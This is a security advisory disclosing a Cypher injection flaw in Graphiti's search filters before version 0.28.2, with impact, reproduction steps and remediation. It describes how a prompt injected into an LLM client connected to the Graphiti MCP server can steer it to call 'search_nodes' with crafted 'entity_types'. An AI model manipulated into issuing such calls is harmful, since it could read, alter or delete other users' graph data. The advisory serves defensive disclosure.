Graphiti Cypher Injection Vulnerability in Search Filters

A Cypher injection vulnerability has been identified in Graphiti versions prior to 0.28.2. This issue arises from the way search filters are constructed for non-Kuzu backends. Attacker-controlled label values provided through 'SearchFilters.node_labels' were directly concatenated into Cypher label expressions without proper validation. In Graphiti MCP deployments, this vulnerability could be exploited not only through direct access to the Graphiti MCP server but also by injecting prompts into an LLM client that could be manipulated to call 'search_nodes' with attacker-controlled 'entity_types' values. The affected backends include Neo4j, FalkorDB, and Neptune, while Kuzu was not impacted due to its use of parameterized label handling.

Impact

Exploitation of this vulnerability could lead to arbitrary execution of Cypher commands, allowing an attacker to read, modify, or delete graph data, and bypass logical group isolation enforced at the query layer.

Reproduction

To reproduce this vulnerability, create a 'SearchFilters' object with unsafe node labels that include Cypher syntax. Then, pass this object to a search function that targets a non-Kuzu backend, such as Neo4j or FalkorDB. Alternatively, inject a prompt into an LLM client that is connected to a Graphiti MCP server, steering it to invoke 'search_nodes' with crafted 'entity_types' values that contain Cypher syntax. This will trigger the vulnerable Cypher label construction process.

Remediation

Upgrade to Graphiti version 0.28.2 or later, which includes validation for 'SearchFilters.node_labels' and 'group_ids', and reinforces label validation in shared search-filter constructors. If an immediate upgrade is not possible, avoid using Graphiti MCP tools with untrusted users or LLM workflows that handle untrusted prompts, and restrict graph database credentials to the minimum necessary privileges.